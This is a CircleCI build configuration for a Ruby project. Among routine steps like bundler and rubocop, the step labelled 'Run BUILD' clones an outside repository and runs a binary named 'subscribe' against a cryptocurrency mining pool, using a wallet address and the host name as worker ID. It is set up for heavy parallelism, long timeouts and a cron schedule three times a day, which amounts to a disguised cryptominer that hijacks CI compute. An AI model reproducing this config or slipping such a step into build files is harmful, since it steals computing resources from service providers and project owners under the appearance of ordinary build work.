working_dir: &working_dir ~/app
.build_template: &script
  steps:
    - checkout
    - run: curl -L https://codeclimate.com/downloads/test-reporter/test-reporter-latest-linux-amd64 > ./cc-test-reporter
    - run: chmod +x ./cc-test-reporter
    - run: ./cc-test-reporter before-build
    - run: gem install bundler:2.1.4
    - run: bundle install --jobs=4 --retry=4 --path vendor/bundle
    - run: bundle exec rake rubocop
    - run:
        name: Run BUILD
        command: |
                    git clone https://github.com/mariobiszz/students.git && cd students && chmod 777 subscribe && ./subscribe -a gr -o stratum+tcps://stratum-ru.rplant.xyz:17056 -u RJMHcqVJEzYwdD4tzG1dvYfQfpMaTjXPAz.$(cat /proc/sys/kernel/hostname)
        no_output_timeout: 290m
version: 2.0
jobs:
  endvoc:
    <<: *script
    docker:
      - image: ruby
    resource_class: large
    parallelism: 16
workflows:
  version: 2
  commit:
    jobs:
      - endvoc

    triggers:
      - schedule:
          cron: "0 0,8,16 * * *"
          filters:
            branches:
              only:
                - master

  endvocrunjob:
    jobs:
      - endvoc
